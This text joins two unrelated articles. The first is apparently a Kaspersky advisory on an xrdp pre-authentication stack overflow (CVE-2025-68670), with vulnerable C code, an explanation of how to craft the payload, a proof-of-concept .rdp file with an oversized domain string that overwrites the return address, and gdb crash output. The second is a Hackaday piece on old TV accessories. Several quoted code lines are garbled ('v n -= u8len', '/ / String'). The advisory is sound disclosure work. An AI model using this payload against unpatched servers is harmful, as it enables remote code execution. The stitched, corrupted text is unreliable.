In addition to KasperskyOS-powered solutions, Kaspersky offers various utility software to streamline business operations. For instance, users of Kaspersky Thin Client, an operating system for thin clients, can also purchase Kaspersky USB Redirector, a module that expands the capabilities of the xrdp remote desktop server for Linux. This module enables access to local USB devices, such as flash drives, tokens, smart cards, and printers, within a remote desktop session – all while maintaining connection security.

We take the security of our products seriously and regularly conduct security assessments. Kaspersky USB Redirector is no exception. Last year, during a security audit of this tool, we discovered a remote code execution vulnerability in the xrdp server, which was assigned the identifier CVE-2025-68670. We reported our findings to the project maintainers, who responded quickly: they fixed the vulnerability in version 0.10.5, backported the patch to versions 0.9.27 and 0.10.4.1, and issued a security bulletin. This post breaks down the details of CVE-2025-68670 and provides recommendations for staying protected.

Client data transmission via RDP

Establishing an RDP connection is a complex, multi-stage process where the client and server exchange various settings. In the context of the vulnerability we discovered, we are specifically interested in the Secure Settings Exchange, which occurs immediately before client authentication. At this stage, the client sends protected credentials to the server within a Client Info PDU (protocol data unit with client info): username, password, auto-reconnect cookies, and so on. These data points are bundled into a TS_INFO_PACKET structure and can be represented as Unicode strings up to 512 bytes long, the last of which must be a null terminator. In the xrdp code, this corresponds to the xrdp_client_info structure, which looks as follows:
{
[..SNIP..]
char username[INFO_CLIENT_MAX_CB_LEN];
char password[INFO_CLIENT_MAX_CB_LEN];
char domain[INFO_CLIENT_MAX_CB_LEN];
char program[INFO_CLIENT_MAX_CB_LEN];
char directory[INFO_CLIENT_MAX_CB_LEN];
[..SNIP..]
}
The value of the INFO_CLIENT_MAX_CB_LEN constant corresponds to the maximum string length and is defined as follows:
#define INFO_CLIENT_MAX_CB_LEN 512
When transmitting Unicode data, the client uses the UTF-16 encoding. However, the server converts the data to UTF-8 before saving it.
if (ts_info_utf16_in( //
[1] s, len_domain, self->rdp_layer->client_info.domain, sizeof(self->rdp_layer->client_info.domain)) != 0) //
[2]{
[..SNIP..]
}
The size of the buffer for unpacking the domain name in UTF-8 [2] is passed to the ts_info_utf16_in function [1], which implements buffer overflow protection [3].
static int ts_info_utf16_in(struct stream *s, int src_bytes, char *dst, int dst_len)
{
int rv = 0;
LOG_DEVEL(LOG_LEVEL_TRACE, "ts_info_utf16_in: uni_len %d, dst_len %d", src_bytes, dst_len);
if (!s_check_rem_and_log(s, src_bytes + 2, "ts_info_utf16_in"))
{
rv = 1;
}
else
{
int term;
int num_chars = in_utf16_le_fixed_as_utf8(s, src_bytes / 2,
dst, dst_len);
if (num_chars > dst_len) //
[3] {
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: output buffer overflow"); rv = 1;
}
/ / String should be null-terminated. We haven't read the terminator yet
in_uint16_le(s, term);
if (term != 0)
{
LOG(LOG_LEVEL_ERROR, "ts_info_utf16_in: bad terminator. Expected 0, got %d", term);
rv = 1;
}
}
return rv;
}
Next, the in_utf16_le_fixed_as_utf8_proc function, where the actual data conversion from UTF-16 to UTF-8 takes place, checks the number of bytes written [4] as well as whether the string is null-terminated [5].
{
unsigned int rv = 0;
char32_t c32;
char u8str[MAXLEN_UTF8_CHAR];
unsigned int u8len;
char *saved_s_end = s->end;

// Expansion of S_CHECK_REM(s, n*2) using passed-in file and line #ifdef USE_DEVEL_STREAMCHECK
parser_stream_overflow_check(s, n * 2, 0, file, line); #endif
// Temporarily set the stream end pointer to allow us to use
// s_check_rem() when reading in UTF-16 words
if (s->end - s->p > (int)(n * 2))
{
s->end = s->p + (int)(n * 2);
}

while (s_check_rem(s, 2))
{
c32 = get_c32_from_stream(s);
u8len = utf_char32_to_utf8(c32, u8str);
if (u8len + 1 <= vn) //
[4] {
/* Room for this character and a terminator. Add the character */
unsigned int i;
for (i = 0 ; i < u8len ; ++i)
{
v[i] = u8str[i];
}

v n -= u8len;
v += u8len;
}

else if (vn > 1)
{
/* We've skipped a character, but there's more than one byte
* remaining in the output buffer. Mark the output buffer as
* full so we don't get a smaller character being squeezed into
* the remaining space */
vn = 1;
}

r v += u8len;
}
// Restore stream to full length s->end = saved_s_end;
if (vn > 0)
{
*v = '\0'; //
[5] }
+ +rv;
return rv;
}
Consequently, up to 512 bytes of input data in UTF-16 are converted into UTF-8 data, which can also reach a size of up to 512 bytes.

CVE-2025-68670: an RCE vulnerability in xrdp

The vulnerability exists within the xrdp_wm_parse_domain_information function, which processes the domain name saved on the server in UTF-8. Like the functions described above, this one is called before client authentication, meaning exploitation does not require valid credentials. The call stack below illustrates this.
x rdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
xrdp_login_wnd_create(struct xrdp_wm *self)
xrdp_wm_init(struct xrdp_wm *self)
xrdp_wm_login_state_changed(struct xrdp_wm *self)
xrdp_wm_check_wait_objs(struct xrdp_wm *self)
xrdp_process_main_loop(struct xrdp_process *self)
The code snippet where the vulnerable function is called looks like this:
char resultIP[256]; //
[7][..SNIP..]
combo->item_index = xrdp_wm_parse_domain_information(
self->session->client_info->domain, //
[6] combo->data_list->count, 1,
resultIP /* just a dummy place holder, we ignore
*/ );
As you can see, the first argument of the function in line [6] is the domain name up to 512 bytes long. The final argument is the resultIP buffer of 256 bytes (as seen in line [7]). Now, let’s look at exactly what the vulnerable function does with these arguments.
static int
xrdp_wm_parse_domain_information(char *originalDomainInfo, int comboMax,
int decode, char *resultBuffer)
{
int ret;
int pos;
int comboxindex;
char index[2];

/* If the first char in the domain name is '_' we use the domain name as IP*/
ret = 0; /* default return value */
/* resultBuffer assumed to be 256 chars */
g_memset(resultBuffer, 0, 256);
if (originalDomainInfo[0] == '_') //
[8] {
/* we try to locate a number indicating what combobox index the user
* prefer the information is loaded from domain field, from the client
* We must use valid chars in the domain name.
* Underscore is a valid name in the domain.
* Invalid chars are ignored in microsoft client therefore we use '_'
* again. this sec '__' contains the split for index.*/
pos = g_pos(&originalDomainInfo[1], "__"); //
[9] if (pos > 0)
{
/* an index is found we try to use it */
LOG(LOG_LEVEL_DEBUG, "domain contains index char __");
if (decode)
{
[..SNIP..]
}
/ * pos limit the String to only contain the IP */
g_strncpy(resultBuffer, &originalDomainInfo[1], pos); //
[10] }
else
{
LOG(LOG_LEVEL_DEBUG, "domain does not contain _");
g_strncpy(resultBuffer, &originalDomainInfo[1], 255);
}
}
return ret;
}
As seen in the code, if the first character of the domain name is an underscore (line [8]), a portion of the domain name – starting from the second character and ending with the double underscore (“__”) – is written into the resultIP buffer (line [9]). Since the domain name can be up to 512 bytes long, it may not fit into the buffer even if it’s technically well-formed (line [10]). Consequently, the overflow data will be written to the thread stack, potentially modifying the return address. If an attacker crafts a domain name that overflows the stack buffer and replaces the return address with a value they control, execution flow will shift according to the attacker’s intent upon returning from the vulnerable function, allowing for arbitrary code execution within the context of the compromised process (in this case, the xrdp server).

To exploit this vulnerability, the attacker simply needs to specify a domain name that, after being converted to UTF-8, contains more than 256 bytes between the initial “_” and the subsequent “__”. Given that the conversion follows specific rules easily found online, this is a straightforward task: one can simply take advantage of the fact that the length of the same string can vary between UTF-16 and UTF-8. In short, this involves avoiding ASCII and certain other characters that may take up more space in UTF-16 than in UTF-8, while also being careful not to abuse characters that expand significantly after conversion. If the resulting UTF-8 domain name exceeds the 512-byte limit, a conversion error will occur.

PoC

As a PoC for the discovered vulnerability, we created the following RDP file containing the RDP server’s IP address and a long domain name designed to trigger a buffer overflow. In the domain name, we used a specific number of K (U+041A) characters to overwrite the return address with the string “AAAAAAAA”. The contents of the RDP file are shown below:
alternate full address:s:172.22.118.7
full address:s:172.22.118.7
domain:s:_veryveryveryverKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKeryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveryveaaaaaaaaryveryveryveryveryveryveryveryveryveryveryveryverylongdoAAAAAAAA__0
username:s:testuser
When you open this file, the mstsc.exe process connects to the specified server. The server processes the data in the file and attempts to write the domain name into the buffer, which results in a buffer overflow and the overwriting of the return address. If you look at the xrdp memory dump at the time of the crash, you can see that both the buffer and the return address have been overwritten. The application terminates during the stack canary check. The example below was captured using the gdb debugger.
gef➤ bt
#0 __pthread_kill_implementation (no_tid=0x0, signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:44
#1 __pthread_kill_internal (signo=0x6, threadid=0x7adb2dc71740) at ./nptl/pthread_kill.c:78
#2 __GI___pthread_kill (threadid=0x7adb2dc71740, signo=signo@entry=0x6) at./nptl/pthread_kill.c:89
#3 0x00007adb2da42476 in __GI_raise (sig=sig@entry=0x6) at ../sysdeps/posix/raise.c:26
#4 0x00007adb2da287f3 in __GI_abort () at ./stdlib/abort.c:79
#5 0x00007adb2da89677 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7adb2dbdb92e "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:156
#6 0x00007adb2db3660a in __GI___fortify_fail (msg=msg@entry=0x7adb2dbdb916 "stack smashing detected") at ./debug/fortify_fail.c:26
#7 0x00007adb2db365d6 in __stack_chk_fail () at ./debug/stack_chk_fail.c:24
#8 0x000063654a2e5ad5 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x00007adb00000a00 in ?? ()
#11 0x0000000000050004 in ?? ()
#12 0x00007fff91732220 in ?? ()
#13 0x000000000000030a in ?? ()
#14 0xfffffffffffffff8 in ?? ()
#15 0x000000052dc71740 in ?? ()
#16 0x3030305f70647278 in ?? ()
#17 0x616d5f6130333030 in ?? ()
#18 0x00636e79735f6e69 in ?? ()
#19 0x0000000000000000 in ?? ()

Protection against vulnerability exploitation

It is worth noting that the vulnerable function can be protected by a stack canary via compiler settings. In most compilers, this option is enabled by default, which prevents an attacker from simply overwriting the return address and executing a ROP chain. To successfully exploit the vulnerability, the attacker would first need to obtain the canary value.

The vulnerable function is also referenced by the xrdp_wm_show_edits function; however, even in that case, if the code is compiled with secure settings (using stack canaries), the most trivial exploitation scenario remains unfeasible.

Nevertheless, a stack canary is not a panacea. An attacker could potentially leak or guess its value, allowing them to overwrite the buffer and the return address while leaving the canary itself unchanged. In the security bulletin dedicated to CVE-2025-68670, the xrdp maintainers advise against relying solely on stack canaries when using the project.

Vulnerability remediation timeline

• 12/05/2025: we submitted the vulnerability report via github.com/neutrinolabs/xrdp/s…
• 12/05/2025: the project maintainers immediately confirmed receipt of the report and stated they would review it shortly.
• 12/15/2025: investigation and prioritization of the vulnerability began.
• 12/18/2025: the maintainers confirmed the vulnerability and began developing a patch.
• 12/24/2025: the vulnerability was assigned the identifier CVE-2025-68670.
• 01/27/2026: the patch was merged into the project’s main branch.

Conclusion

Taking a responsible approach to code makes not only our own products more solid but also enhances popular open-source projects. We have previously shared how security assessments of KasperskyOS-based solutions – such as Kaspersky Thin Client and Kaspersky IoT Secure Gateway – led to the discovery of several vulnerabilities in Suricata and FreeRDP, which project maintainers quickly patched. CVE-2025-68670 is yet another one of those stories.

However, discovering a vulnerability is only half the battle. We would like to thank the xrdp maintainers for their rapid response to our report, for fixing the vulnerability, and for issuing a security bulletin detailing the issue and risk mitigation options.

securelist.com/cve-2025-68670/…

It is hard to imagine that a handful of decades ago, TV wasn’t a thing. We’ve talked a few times about the birth of television. After an admittedly slow slow start, it took over like wildfire. Of course, anything that sells millions will spawn accessories. Some may be great. Then there are others.

We wanted to take a nostalgic look back at some of the strange add-ons people used to put on or in their TVs. Sure, VCRs, DVD players, and video game consoles were popular. But we were thinking a little more obscure than that.

Rabbit Ears

A state-of-the-art set of rabbit ears from the 1970s
Every once in a while, we see an ad or a box in a store touting the ability to get great TV programming for free. Invariably, it is a USB device that lets you watch free streaming channels or it is an antenna. There was a time when nearly all TVs had “rabbit ears” — so called because they made an inverted V on the top of your set.

These dipoles were telescoping and you were supposed to adjust them to fit the TV station you were watching but everyone “knew” that you wanted them as long as possible at all times. Holding one end of them gave it a ground and would give you a major improvement in picture. People also liked to wrap tin foil around the tips. Was it like a capacitive hat? We aren’t sure.

The better rabbit ears had knobs and switches along with multiple elements. If you lived close to a TV station, you probably didn’t need much. If you didn’t, no number of fancy add-ons would likely help you.

External Antenna with Rotator

Antennas like this used to tower over many homes, especially in suburbia
If you really wanted to get TV from a distance, you needed an outside antenna. Most of these were either yagi or log periodic designs. That means they were very directional. The also means you probably needed a way to rotate it. If you were lucky, all the TV stations were in the same direction from you. Then you didn’t need to rotate your antenna. Some UHF-only antennas looked like dishes and they, too, were directional.

Rotators were crazy. They were all a little different, but typically you’d move a big knob to the direction you wanted the antenna pointing. Then you’d hear CHUNK, CHUNK, CHUNK as the antenna actually moved. This was a cheap form of stepper motor. Some rotators used something akin to a selsyn to move continuously, but most just moved to a few dozen points around a circle. Hams still use modern versions of antenna rotators to adjust directional antennas.

CRT Brightener

The most expensive part of any old TV was the picture tube. These tubes were fragile and expensive to make and ship, so it was often the case that if the ‘tube went out, it was cheaper to just buy a new TV.

When a picture tube started to go dark, you could sometimes run a high voltage through it to restore it (you being a TV repairman with the equipment to do it). Or, you could try installing a CRT brightener. These devices looked a little like tubes. You’d remove the connector from the CRT’s neck and install the device. Then, the wire that used to plug into the CRT would plug into the other side of the device.

These were essentially little transformers that boosted the AC voltage going to the filaments. They worked for a while, but it probably meant a new TV wasn’t far in your future. If you want to know more than you could possibly imagine about how these work, there was an article in Radio Electronics written by someone who worked for a company that made them, and it goes into incredible detail. [Chris] shows us a 1950s TV that had one of these in it. You could actually stack these one on top the other if you wanted to take your chances and try to keep the old TV working as long as possible.

youtube.com/embed/uqOjlUxGt1s?…

Ghost Eliminator

If it phases the ground wave, it has got to be good!
According to a Layfayette Electronics catalog the Rembrandt TV Ghost Eliminator “Electrically rotates the polar-receiving pattern of your existing antenna and phases the ground wave picked up by the electrical wiring system with the sky wave picked up by the antenna.” What?

As far as we can tell, these units were just attenuators, which reduced weaker signals below the receiver’s ability to find them.

Tuner Rebuild and Cleaners

One of the key components of a TV was the tuner. Because of the high frequencies and the low technology of the day, these were usually a compact unit that was directly behind the knob you used to change channels. The output of the tuner was relatively a low-frequency signal at the intermediate frequency, and that’s what the rest of the TV used.

It was difficult to make broadband devices back then, so the tuners usually had banks of tuned circuits, and a giant mechanical switch selected the ones you wanted. That’s why you turned the knob to pick the channel you wanted. With contacts like that, they eventually get dirty. Contact cleaners for tuners were common and probably contained a lot of things you aren’t allowed to put in spray cans today. Tun-O-Foam was one common brand.
If your tuner did UHF and VHF, it was actually $15!
But if you really had trouble with your tuner, you could pull it out and send it to one of the many companies that would clean and service it for a low price. For a little more, you could buy a refurbished tuner from the same people. They’d always advertise a low price but note that tubes, transistors, and diodes were charged “at cost.” Shipping, too, usually. The reality is that most tuners probably needed a good cleaning and, perhaps, a realignment.

Tube Testers/Tube Guard

You’ve probably heard us talk about tube testers before. One thing that is the enemy of tubes is inrush current. A cold filament draws more current than a hot filament, so tubes get a big jolt of current while they are warming up. The “Tube Guard” was a device you plugged into the wall and then plugged the TV into it. It would prevent fast inrush current. Maybe that would save you a trip to the tube tester at the local drugstore.

You could go into many drugstores and other retail places and find a tube tester. There was usually a book or some other way to look up your tube. The book would tell you to put in socket #8 and set switch 1 to F, switch 2 to A, and so on. Then you’d push a button and big meter would move a needle to a green region if the tube was good or a red region if it was bad. Of course, that wasn’t foolproof, but it did work much of the time since tubes have common failure modes.

If the tube was bad, you’d open the bottom of the tester, find the replacement tube and take it to the register. There were also portable units that service people might carry, like the one in the video below. Like many of the meters, it didn’t have a book, but it had a scroll that you would roll to find the right settings. However, a typical retail store tube tester was usually easier to use than these specialized units.

youtube.com/embed/0LZ4siFkbk0?…

That’s Not All

There are plenty of other TV gadgets. We mentioned the old VCRs, DVDs, and video games, of course. But there were also color wheels, magnifying screens and more. We’ve even seen boxes that claim to convert your TV into a video phone.

You could get a box that would censor swear words. You could even get pay TV in the 1960s if you were willing to put coins into your set.

Many of the images in this post are from scans of old magazines and catalogs from the World Radio History site. A great resource if you enjoy looking at the way things were. The featured image, however, is a still of “1950s TV set“, a 3D model by [Kathrin&Christian].

hackaday.com/2024/09/27/retro-…